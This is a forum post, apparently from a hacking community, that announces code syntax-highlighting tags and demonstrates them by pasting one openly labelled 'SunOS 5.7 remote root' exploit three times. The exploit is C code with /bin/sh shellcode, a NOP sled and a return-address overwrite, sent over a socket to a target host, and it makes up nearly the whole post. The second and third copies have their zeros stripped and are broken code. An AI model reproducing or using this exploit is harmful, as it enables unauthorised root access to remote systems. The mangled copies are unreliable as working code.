Code Syntax Highlighting

6 replies [Last post]
RaT
RaT's picture
Online
SX High Council
Joined: 2008/03/12

We have finally finished with code syntax highlighting. In order to take advantage of it, you can use < >, [ ], or [[ ]]

The supported languages are ASM, Bash (scripting), C, C++, C#, DOS (scripting), Java, Javascript, Perl, PHP, Python, and Ruby. To use them, just put the tag name in the brackets. If there is a language that you would like to use that isn't supported, please post a reply to this thread. Here is the current tag list:

Language Name = [Tag]
ASM = [asm]
Bash = [bash]
C = [c]
C++ = [cpp]
C# = [csharp]
DOS = [dos]
Java = [java]
Javascript = [javascript]
Perl = [perl]
PHP = [php]
Python = [python]
Ruby = [ruby]

For unsupported languages, use < code> and </code > blocks.

Language choice determines syntax highlighting. We will use an old CloudAss modified exploit as an example. It was written in C, but we will initially post it as "unsupported" or "code". So <code> source code here </code> yields the following:

/*
 * sunOS 5.7 REMOTE ROOT
 * DO NOT DISTR. !!!!§$§"
 * (C) bi0nic ..if u dont know how this works fuck off
 * Fixed by cloudass of SOLDIERX
 */

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <arpa/inet.h>

#define PROTOC  "tcp"
#define BSIZE   "255"
#define NOP      0x90
#define NSPORT   "53"

unsigned long get_sp(void)
 {
__asm__("movl %esp,%eax");
}

char query1[] =
"select sqlOrigin,sqlOwner,sqlClass,sqlType,sqlData,sqlTTL,sqlPref,sqlID,unix_timestamp(sqlTime) from";

char query2[] =
"\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x73\x71\x6c\x49\x44\x0a";

char shellcodez[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
  int sock, bsize=BSIZE, i = 0;
  unsigned long addr = 0;
  struct servent *serviceaddr;
  struct hostent *hostaddr;
  struct protoent *protocol;
  struct sockaddr_in socketaddr;
  char *buff;
  char *big;
 
  /*  Argz n stuph  */
  printf("[ SunOS Remote root exploit. ]\n");
  printf("[ By: bi0nic ] | [ gH Crew ]\n");
  printf(" ^^fixed by cloudass of SOLDIERX^^}\n");
  if(argv[1] == NULL) {
    printf("Use: %s <host>\n", argv[0]);
    exit(0);
  }
  if(argv[2] == NULL) {
    addr = get_sp();
  } else {
    addr = get_sp() + atoi(argv[2]);
  }
 
  /*  Get the buffer ready  */
  buff = malloc(bsize+300);
  memset(buff, NOP, bsize + 300);
  memcpy(buff + (bsize - strlen(shellcodez)),shellcodez,strlen(shellcodez));
  for (i = bsize; i <= (bsize + 300); i += 4)
    *(long *)&buff[i] = addr;
  printf("Useing offset: 0x%x\n", addr);
 
  /*  open a socket to the server  */
  bzero((char *) &socketaddr, sizeof(socketaddr));
  socketaddr.sin_family = AF_INET;
  serviceaddr = NSPORT;
  if(!serviceaddr) { printf("Couldnt resolve service\n"); exit(0); }
  socketaddr.sin_port = serviceaddr->s_port;
  hostaddr = gethostbyname(argv[1]);
  if(!hostaddr) { printf("Could not resolve host: %s\n",argv[1]); exit(0); }
  memcpy(&socketaddr.sin_addr, hostaddr->h_addr, hostaddr->h_length);
  protocol = getprotobyname(PROTOC);
  sock = socket(AF_INET, SOCK_STREAM, protocol->p_proto);
  if(!sock) { printf("Socket failed\n"); exit(0); }
  if(connect(sock, &socketaddr, sizeof(socketaddr)) < 0) { printf("Connect failed\n"); exit(0); }
  printf("Connected to: %s\n", argv[1]);
 
  /*  Attempt exploit  */
  printf("Attempting exploit.\n");
  /*  big = query1 + buff + query2;    */
  /*  send(sock, big, strlen(big), 0); */
  send(sock, query1, strlen(query1), 0);
  send(sock, buff, strlen(buff), 0);
  send(sock, query2, strlen(query2), 0);
  close(sock);
  printf("|[ gH ]|\n");
  printf("Something Wicked This Way Comes....\n");
  return 0;
}

Clearly this code is in C, but we specified it as generic <code> so it doesn't do any highlighting (but it does keep the format). This can be useful for posting text. Next we will take a stab at it being javascript. <javascript>source code here </javascript> yields the following:

/*
 * sunOS 5.7 REMOTE ROOT
 * DO NOT DISTR. !!!!§$§"
 * (C) bi0nic ..if u dont know how this works fuck off
 * Fixed by cloudass of SOLDIERX
 */


#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <arpa/inet.h>

#define PROTOC  "tcp"
#define BSIZE   "255"
#define NOP      0x90
#define NSPORT   "53"

unsigned long get_sp(void)
 {
__asm__("movl %esp,%eax");
}

char query1[] =
"select sqlOrigin,sqlOwner,sqlClass,sqlType,sqlData,sqlTTL,sqlPref,sqlID,unix_timestamp(sqlTime) from";

char query2[] =
"\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x73\x71\x6c\x49\x44\x0a";

char shellcodez[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
  int sock, bsize=BSIZE, i = ;
  unsigned long addr = ;
  struct servent *serviceaddr;
  struct hostent *hostaddr;
  struct protoent *protocol;
  struct sockaddr_in socketaddr;
  char *buff;
  char *big;
 
  /*  Argz n stuph  */
  printf("[ SunOS Remote root exploit. ]\n");
  printf("[ By: bi0nic ] | [ gH Crew ]\n");
  printf(" ^^fixed by cloudass of SOLDIERX^^}\n");
  if(argv[1] == NULL) {
    printf("Use: %s <host>\n", argv[]);
    exit();
  }
  if(argv[2] == NULL) {
    addr = get_sp();
  } else {
    addr = get_sp() + atoi(argv[2]);
  }
 
  /*  Get the buffer ready  */
  buff = malloc(bsize+300);
  memset(buff, NOP, bsize + 300);
  memcpy(buff + (bsize - strlen(shellcodez)),shellcodez,strlen(shellcodez));
  for (i = bsize; i <= (bsize + 300); i += 4)
    *(long *)&buff[i] = addr;
  printf("Useing offset: 0x%x\n", addr);
 
  /*  open a socket to the server  */
  bzero((char *) &socketaddr, sizeof(socketaddr));
  socketaddr.sin_family = AF_INET;
  serviceaddr = NSPORT;
  if(!serviceaddr) { printf("Couldnt resolve service\n"); exit(); }
  socketaddr.sin_port = serviceaddr->s_port;
  hostaddr = gethostbyname(argv[1]);
  if(!hostaddr) { printf("Could not resolve host: %s\n",argv[1]); exit(); }
  memcpy(&socketaddr.sin_addr, hostaddr->h_addr, hostaddr->h_length);
  protocol = getprotobyname(PROTOC);
  sock = socket(AF_INET, SOCK_STREAM, protocol->p_proto);
  if(!sock) { printf("Socket failed\n"); exit(); }
  if(connect(sock, &socketaddr, sizeof(socketaddr)) < ) { printf("Connect failed\n"); exit(); }
  printf("Connected to: %s\n", argv[1]);
 
  /*  Attempt exploit  */
  printf("Attempting exploit.\n");
  /*  big = query1 + buff + query2;    */
  /*  send(sock, big, strlen(big), 0); */
  send(sock, query1, strlen(query1), );
  send(sock, buff, strlen(buff), );
  send(sock, query2, strlen(query2), );
  close(sock);
  printf("|[ gH ]|\n");
  printf("Something Wicked This Way Comes....\n");
  return ;
}

As you can see above, <javascript> does some syntax highlighting - but not the right syntax highlighting. Finally, we will use the correct tag of <c>source code here </c> which yields the following:

/*
 * sunOS 5.7 REMOTE ROOT
 * DO NOT DISTR. !!!!§$§"
 * (C) bi0nic ..if u dont know how this works fuck off
 * Fixed by cloudass of SOLDIERX
 */


#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <arpa/inet.h>

#define PROTOC  "tcp"
#define BSIZE   "255"
#define NOP      0x90
#define NSPORT   "53"

unsigned long get_sp(void)
 {
__asm__("movl %esp,%eax");
}

char query1[] =
"select sqlOrigin,sqlOwner,sqlClass,sqlType,sqlData,sqlTTL,sqlPref,sqlID,unix_timestamp(sqlTime) from";

char query2[] =
"\x6f\x72\x64\x65\x72\x20\x62\x79\x20\x73\x71\x6c\x49\x44\x0a";

char shellcodez[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char *argv[]) {
  int sock, bsize=BSIZE, i = ;
  unsigned long addr = ;
  struct servent *serviceaddr;
  struct hostent *hostaddr;
  struct protoent *protocol;
  struct sockaddr_in socketaddr;
  char *buff;
  char *big;
 
  /*  Argz n stuph  */
  printf("[ SunOS Remote root exploit. ]\n");
  printf("[ By: bi0nic ] | [ gH Crew ]\n");
  printf(" ^^fixed by cloudass of SOLDIERX^^}\n");
  if(argv[1] == NULL) {
    printf("Use: %s <host>\n", argv[]);
    exit();
  }
  if(argv[2] == NULL) {
    addr = get_sp();
  } else {
    addr = get_sp() + atoi(argv[2]);
  }
 
  /*  Get the buffer ready  */
  buff = malloc(bsize+300);
  memset(buff, NOP, bsize + 300);
  memcpy(buff + (bsize - strlen(shellcodez)),shellcodez,strlen(shellcodez));
  for (i = bsize; i <= (bsize + 300); i += 4)
    *(long *)&buff[i] = addr;
  printf("Useing offset: 0x%x\n", addr);
 
  /*  open a socket to the server  */
  bzero((char *) &socketaddr, sizeof(socketaddr));
  socketaddr.sin_family = AF_INET;
  serviceaddr = NSPORT;
  if(!serviceaddr) { printf("Couldnt resolve service\n"); exit(); }
  socketaddr.sin_port = serviceaddr->s_port;
  hostaddr = gethostbyname(argv[1]);
  if(!hostaddr) { printf("Could not resolve host: %s\n",argv[1]); exit(); }
  memcpy(&socketaddr.sin_addr, hostaddr->h_addr, hostaddr->h_length);
  protocol = getprotobyname(PROTOC);
  sock = socket(AF_INET, SOCK_STREAM, protocol->p_proto);
  if(!sock) { printf("Socket failed\n"); exit(); }
  if(connect(sock, &socketaddr, sizeof(socketaddr)) < ) { printf("Connect failed\n"); exit(); }
  printf("Connected to: %s\n", argv[1]);
 
  /*  Attempt exploit  */
  printf("Attempting exploit.\n");
  /*  big = query1 + buff + query2;    */
  /*  send(sock, big, strlen(big), 0); */
  send(sock, query1, strlen(query1), );
  send(sock, buff, strlen(buff), );
  send(sock, query2, strlen(query2), );
  close(sock);
  printf("|[ gH ]|\n");
  printf("Something Wicked This Way Comes....\n");
  return ;
}

Now that's the stuff! Please post any questions or requested languages to this thread.